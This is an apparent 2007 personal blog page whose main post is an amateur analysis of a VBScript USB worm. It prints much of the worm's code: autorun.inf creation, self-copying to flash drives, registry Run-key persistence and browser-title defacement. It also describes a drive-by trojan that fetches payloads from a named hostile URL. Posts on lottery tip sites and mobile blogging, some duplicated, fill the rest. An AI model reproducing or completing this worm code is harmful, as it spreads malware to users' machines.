Do you know what to win for todays 4D?
Don't know ? No problem, just surf on 4D internet guru...
Surprisingly to heard from my friend, there are IT people create website to offer buy 4D tips.
Wow, what's a funny idea ( when I first heard about it ), but it works in the real society!
( no wonder 4D wont falls ) =)
There are more and more special , funny, tricky idea for web business.
Well, some of them really just a trick! and I just learn a word from my friend blog named E-Barrel.
Yes, this remind me MLM ( Piramid type ) , where lot of people at the bottom utilized by upper fellow. And now it spread through web technology.
Just beware of it! There are lot kinds of web links, IMs, email as well as sms spreading it.
Apr 27, 2007
Apr 26, 2007
Experiece VBscript Trojan
Last fews day suddenly found a VBS file generated in my pendrive.
with my curiosity, I open it up and shocked with it!
Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe EHR02.vbs"
This line will auto populate and execute the vbscripts.
and this line, that populate the vbscripts to my pen drive!
Besides, this file is populated to other system path such as windows, windows\system, windows\system32 and so on.
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\EHR02.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\EHR02.vbs",2,true)
tf.write mysource
tf.close
And finally this line will register the code in windows startup registry and pop a message out a message "Mutation of Trojan virus!" when the date is the 9th !!
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else
And yet another response if the day is not the 9th, your IE browser tittle will be changed to
"Hack by xxxxx"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")
Well, I am shocked, but excited about it!
And I am looking into VBscript in my machine and found that actualy vbscripts use in lot of field, including IIS setup, Project deployment, Photoshop batch action and so on.
It seem nice to 'play' since I am a vb programmer =)
And few days later, I saw a website been hacked by this method again,
that website changed to be IFRAME lines across the screen.
Further tracing into it, It is from "http://www.goldunix.com/test.htm"
This Trojan is using appending Windows Objects in variable and created the object via CreateObject() function
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")
It use the "Microsoft.Adodb.Stream" Get method to load the IFRAME from the hacker site.
Then this trojan using createobject("Scripting.FileSystemObject","") and execute the svchost.exe and received via this svchost from net.
Then using Createobject("Shell.Application","") and execute ShellExecute function to create more svchost to retrieve and insert rubbish IFrame code that block the original website.
All this process is from a HTML file which having vbscript inside and unluckly user allow their Active X control in their IE to allow the trojan activated.
I tested that html file and no issue for my FireFox =) ha ha ha...
but IE user have to be careful in allowing unkonwn ActiveX ya !
Trojan is danger, but is fun to a programmer, ha ha ha...... ( just kidding to some non-IT guys )
with my curiosity, I open it up and shocked with it!
Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe EHR02.vbs"
This line will auto populate and execute the vbscripts.
and this line, that populate the vbscripts to my pen drive!
Besides, this file is populated to other system path such as windows, windows\system, windows\system32 and so on.
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\EHR02.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\EHR02.vbs",2,true)
tf.write mysource
tf.close
And finally this line will register the code in windows startup registry and pop a message out a message "Mutation of Trojan virus!" when the date is the 9th !!
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else
And yet another response if the day is not the 9th, your IE browser tittle will be changed to
"Hack by xxxxx"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")
Well, I am shocked, but excited about it!
And I am looking into VBscript in my machine and found that actualy vbscripts use in lot of field, including IIS setup, Project deployment, Photoshop batch action and so on.
It seem nice to 'play' since I am a vb programmer =)
And few days later, I saw a website been hacked by this method again,
that website changed to be IFRAME lines across the screen.
Further tracing into it, It is from "http://www.goldunix.com/test.htm"
This Trojan is using appending Windows Objects in variable and created the object via CreateObject() function
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")
It use the "Microsoft.Adodb.Stream" Get method to load the IFRAME from the hacker site.
Then this trojan using createobject("Scripting.FileSystemObject","") and execute the svchost.exe and received via this svchost from net.
Then using Createobject("Shell.Application","") and execute ShellExecute function to create more svchost to retrieve and insert rubbish IFrame code that block the original website.
All this process is from a HTML file which having vbscript inside and unluckly user allow their Active X control in their IE to allow the trojan activated.
I tested that html file and no issue for my FireFox =) ha ha ha...
but IE user have to be careful in allowing unkonwn ActiveX ya !
Trojan is danger, but is fun to a programmer, ha ha ha...... ( just kidding to some non-IT guys )
Apr 25, 2007
Blog Via Email
Since sometimes ago, I came across a website or concept named moBlog ( mobile blogging )
This concept will let user to create their blog content in the real time.
User can snap picture via their favorite pda/mobile phone and send it as MMS to blog hosting and published it.
After some months ( Today :P ) , I just knew that Blogger having this features long time ago.
I just created a simple content via my pda and sent to my Blogger Mobile address ( your-blogger-id.your-given-mobileblog-name@blogger.com)
The content will be stored as a draft , and I will able to review and published when I got a line with me, or may be just directly write my blog via my pda.
That is great service! So that I no need to remember what I need to write for my blog and can do this on the real time.
Try it out!
This concept will let user to create their blog content in the real time.
User can snap picture via their favorite pda/mobile phone and send it as MMS to blog hosting and published it.
After some months ( Today :P ) , I just knew that Blogger having this features long time ago.
I just created a simple content via my pda and sent to my Blogger Mobile address ( your-blogger-id.your-given-mobileblog-name@blogger.com)
The content will be stored as a draft , and I will able to review and published when I got a line with me, or may be just directly write my blog via my pda.
That is great service! So that I no need to remember what I need to write for my blog and can do this on the real time.
Try it out!
Welcome to Elinkz / Liew10 / 610 / Yee Ling's Blog
Welcome to Elinkz Blog.
Well, my name is Yee Ling, a guy, just a generic programmer hitting key board all the days and brain processing almost 18 hrs per day.
I had shifted previous blog and start a new one, due to changes of new email account.
Hereby, wish to express some of my personal idea and share with all my friends as well as interested public.
Meet again in next post!
Well, my name is Yee Ling, a guy, just a generic programmer hitting key board all the days and brain processing almost 18 hrs per day.
I had shifted previous blog and start a new one, due to changes of new email account.
Hereby, wish to express some of my personal idea and share with all my friends as well as interested public.
Meet again in next post!
Subscribe to:
Posts (Atom)